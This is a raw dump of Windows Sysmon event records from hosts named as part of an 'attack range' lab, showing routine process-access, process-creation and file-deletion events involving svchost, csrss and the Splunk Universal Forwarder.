14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044329Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044328Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044327Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044326Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1849-629A-1D07-000000006002}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044325Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1849-629A-1D07-000000006002}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044324Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-1849-629A-1D07-000000006002}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:50.956{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFB1CD630BC13AD8F0ABEC2C2E3AE13,SHA256=54E13E58EAA2C3C3B9AB831937309400451EDA714FF318BD2343BF305502BE62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044367Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-184A-629A-1F07-000000006002}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044366Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044365Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044364Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044363Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044362Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044361Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044360Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044359Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044358Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044357Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-184A-629A-1F07-000000006002}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044356Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.951{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-184A-629A-1F07-000000006002}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044355Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.952{0A5DF930-184A-629A-1F07-000000006002}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044354Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.623{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=26F5A1CD752462C28471E6520BF66959,SHA256=3FFD8994CA245715AD7219E8E064CB2A9248B9FD17D38503B4A561115F024837,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044353Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.435{0A5DF930-184A-629A-1E07-000000006002}1576792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044352Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-184A-629A-1E07-000000006002}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044351Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044350Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044349Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044348Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:50.279{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 